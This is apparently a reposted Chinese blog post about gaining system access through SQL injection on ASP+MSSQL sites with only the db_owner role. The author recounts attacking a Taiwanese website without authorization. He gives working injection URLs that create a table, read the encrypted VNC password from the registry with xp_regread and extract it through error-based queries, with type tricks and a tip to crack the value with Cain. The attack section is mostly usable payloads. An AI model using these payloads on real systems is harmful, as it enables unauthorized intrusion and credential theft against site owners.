MSSQL db_owner角色注入直接获得系统权限- -

最新推荐文章于 2024-04-20 08:20:33 发布
最新推荐文章于 2024-04-20 08:20:33 发布
阅读量837 收藏 1
点赞数
分类专栏: 网络安全-注入专题 文章标签: insert 加密 output 服务器 table 测试

相信大家对ASP+MSSQL注入都已经很熟悉了,连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手,如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下,好像也无技可施;除了用备份得到shell的这个思路,我在网上实在没有找出更好的入侵办法。不过,备份得到的shell只是理论化的东东,如果一个webshell有20mb的话,你还能用它吗?前不久,我就碰到了这样的一个台湾网站,管理员的密码倒是用NBSi跑了出来,可是用户名因为是繁体的原因在NBSi中成了一堆乱码。我也找到了后台,可只有干瞪眼的份。怎么办?我又扫了它的所有端口,发现开了5900,估计是管理员用了VNC对服务器进行了远程控制。这时,我就有一个思路,能不能把VNC在注册表的加密密码读出来再来破解呢?看我表演吧!

  TELNET服务器的5900端口,得到讯息如图1所示,证实服务器的确用的是VNC。相信大家都会用读xp_regread来读注册表了,依次提交如下语句:
  http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
这样我们就成功地建了一个名为cyfd的表,并且添加了类型是char,长度为255的字段名gyfd。然后向表中加数据:
_blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software/ORL/WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
从注册表中读出VNC在注册表的加密密码的值,再把值插入到刚建的表中。然后暴出VNC在注册表的加密密码:
_blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。

  可是结果大失我所望,gyfd的值是空的。如果这样容易的话,不会有这篇文章出现了。这是什么原因呢?我的语法不正确?翻来覆去的检查我的语句也没有发现错误呀。难道繁体的vnc在注册表里的位置不一样?后来我又开始在本机装了vnc又在分析查循器里做测试,得到的结果却是个数字5。这时czy上线了,询问了一下,他劝我把gyfd的这个字段改成二进制数据类型 binary来试一下。于是我又在本机测试了一下,依次提交如下语句:
   http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software/ORL/WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd这个字段的值。结果到是出来了,得到了vnc的加密密码值是0x0E3515AC00000000000000000000000000000000。可这儿还不对,我在本机装的vnc在注册表里的密码值是hex:0e,35,15,ac,00,62,d3,08这个呀。原来binary(n)的数据存储长度是固定的,当输入的二进制长度小于n时,余下长度填0补充。我在注入语句中写入的binary(20)是足够写入vnc加密密码的长度时,为什么还有那么多0来填充呢?这是因为正好我的vnc密码是0e3515ac0062d308,在碰到了00的情况下,xp_regread以为已经读完了它的值呢,把00当成了结束符,所以只读到了0x0E3515AC,我晕!

  翻了一下书,终于让我找到了一个特殊的数据类型uniqueidentifier,是用来存储一个16字节长的二进制数据类型。把注入语句改造一下:
   http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
   http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software/ORL/WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下,跑出来了,不过得到的结果是AC15350E-6200-08D3-0000-000000000000。
  AC15350E-6200-08D3-0000-000000000000和我在注册表里的正确的vnc密码的值0e3515ac0062d308相比,能看出来有什么不同吗?只不过顺序是颠倒的,相信大家都会小学的算术,这个不用我教了。试一下用cain破出vnc的密码,看看行不行

  看样子在本机做的测试一切成功。这方法用到台湾上的站点试试,哎,依然没有跑出vnc的密码,也许繁体vnc在注册表的位置不同吧。不过,我研究了一上午,有了一点收获,就放过你吧。

xdfwsl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mssql Db_owner角色注入直接获得系统权限.txt
07-18
Mssql Db_owner角色注入直接获得系统权限.txt
[原创]PB9.0动态连接MSSQL数据库
longge165的专栏
10-29 2605
开发环境:win2000 Advanced Server +MS SQL Server Enterprise Edition+PowerBuilder 9.0一、建立INI文件新建文本文档,输入以下字符:[Database]DBMS=MSSQL SQL Server 2000Database=mymessage   UserId= DatabasePassword=LogId=saLogPassw
MSSQL db_owner角色注入直接获得系统权限
02-16 844
相信大家对ASP+MSSQL注入都已经很熟悉了,连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手,如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下,好像也无技可施;除了用备份得到shell的这个思路,我在网上实在没有找出更好的入侵办法。不过,备份得到的shell只是理论化的东东,如果一个webshell有20m
[渗透测试篇]数据库系统渗透之Mssql提权
qq_43668710的博客
04-18 405
提上日程,月末之前完成
pb连接SYBASE、MS SQL SERVER
堕落的人生
04-14 7694
标签:校园  PowerBuilder程序与数据库之间传递信息的一个结构变量,共有15个成员.你可以详细列表它的所有成员看看它的组成.PB的应用程序会初始化一个全局的结构体变量,SQLCA,当然你也可以自定义一个自己的事务对象.1 DBMS string 所使用的数据库管理系统的名字,如Sybase,Oracle,ODBC。2 Databas
***中遇到MSSQLdb_owner如何处理
weixin_34199405的博客
08-13 116
在我某次的***工作中遇见的一个小问题,其权限设置时非常BT,只能在当前的目录下转悠,调用cmdshell可想而知,一般的尝试方法都将失去效应,但是它的数据库确是MSSQL权限应该不会太高 SrvRoleMember : db_owner 果然,经过查看之后发现时db_owner权限,其实大多数朋友能走到这里说明您还有足够的思路分析能力,那么我们就可以进行我们的...
MSSQL db_owner注入获得系统权限
wangmj518的专栏
12-17 724
相信大家都看过LCX大虾写的《MSSQL db_owner角色注入直接获得系统权限》吧,小弟不自量力也写写我利用MSSQL db_owner角色注入直接获得系统权限的方法。LCX大哥大致取得系统权限的思路是利用MSSQL中xp_regread的存储过程读出vnc在注册表中的密码,然后再破解,就可以拿到管理员权限。可是在网上毕竟装vnc的服务器是少数,要是一台你很想进入的服务器不装vnc,也就是说没
桂林老兵的SQLSERVER高级注入技巧
12-13 1067
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值
mssql中public和db_owner权限下拿到webshell或者系统权限
CC's Blog
11-07 3348
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确
trtwzllbxt-v5.51_mssql架构网站系统_trtwzllbxt-v5.51_ASP+ACCESS_
09-29
前台进行响应式设计,同时兼容PC端及移动端,整站生成静态利于搜索收录。可自动采集(高级插件),搜索引擎主动推送(高级插件),定时发布(高级插件),以及安装其他大量免费插件与模板。
mssql-server_15.0.1400.75-4_amd64.deb
07-13
Linux mssql-server Deepin Linux 15.10实测可运行 mssql-server.service - Microsoft SQL Server Database Engine Loaded: loaded (/lib/systemd/system/mssql-server.service; enabled; vendor preset: enabled)...
project_data-JSP.rar_mssql jsp_专家库_信息管理系统_项目申报_项目管理
09-14
JSP项目申报管理系统,MSSQL数据库,MDF库文件已内附,程序是前两年写的,具备的功能:申报指南、专家登录、修改帐户、项目评审、专家信息、单位信息、分配浏览、系统功能辅助说明等。
PyPI 官网下载 | mssql_to_python3_orm-1.0.2-py3-none-any.whl
02-07
资源来自pypi官网,解压后可用。 资源全名:mssql_to_python3_orm-1.0.2-py3-none-any.whl
服务器感染了.360勒索病毒,如何确保数据文件完整恢复?
weixin_shujuxf的博客
04-16 1004
这些勒索病毒往往攻击入侵的目标基本是Windows系统服务器,包括一些市面上常见的业务应用软件,例如:金蝶软件数据库,用友软件数据库,管家婆软件数据库,速达软件数据库,科脉软件数据库,海典软件数据库,思迅软件数据库,OA软件数据库,ERP软件数据库,自建网站的数据库等,均是其攻击加密的常见目标文件,所以有以上这些业务应用软件的服务器更应该注意做好服务器安全加固及数据备份工作。总的来说,预防.360勒索病毒的关键在于提高警惕,采取必要的安全措施,并定期备份重要数据。:软件更新通常包含对已知安全漏洞的修复。
【c基础】文件操作
hutaotaotao的博客
04-19 695
文件io常用操作
服务器硬件及RAID配置实战
2401_83786744的博客
04-16 718
服务器 分类 机架式居多 塔式 刀片式 机柜式架构 X86 ARM品牌 戴尔 AMD 英特尔 惠普 华为 华三H3C 联想 浪潮 长城规格 1C1G 2C4G 4C8G 32C128G 64C256G查看服务器CPU的信息 cat /proc/cpuinfo lscpumodel name #CPU型号physical id #物理CPU的ID。
Rust腐蚀服务器修改背景和logo图片操作方法
V13807970340的博客
04-16 610
方法三:在rustadmin里操作通过管理员指令添加,首先通过服务端运行窗口输入指令将你的steam账户设置成管理员 owner xxxxxxxxxxxxxxxxx 进入游戏按F1调用出服务器管理面板左上角点击server在convars选择栏找到server.headerimage和server.logeimage这两个选项直接点击后面的铅笔将你的图片地址复制粘贴进去即可。这个东西可以理解为做一个自己的社区或品牌,毕竟这个游戏有很多人开,那么那个服主的售后维护做的好玩家自然而然会更愿意来服务器游玩。
腾讯云开通幻兽帕鲁服务器需要多少钱?30元
最新发布
jiayou2017的博客
04-20 347
腾讯云开通一个幻兽帕鲁服务器需要多少钱?32元1个月,腾讯云专用幻兽帕鲁服务器最低只要32元1个月,配置为4核16G12M,96元3个月、156元6个月。幻兽帕鲁专用服务器8核32G22M配置115元1个月、345元3个月。幻兽帕鲁服务器活动页面。
MSSQL GROUP_CONCAT
03-20
MSSQL并没有内置的GROUP_CONCAT函数,但可以通过使用FOR XML PATH('')来实现类似的功能。FOR XML PATH('')可以将查询结果按照指定的格式进行拼接。 以下是一个示例查询,演示如何使用FOR XML PATH('')来实现类似...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值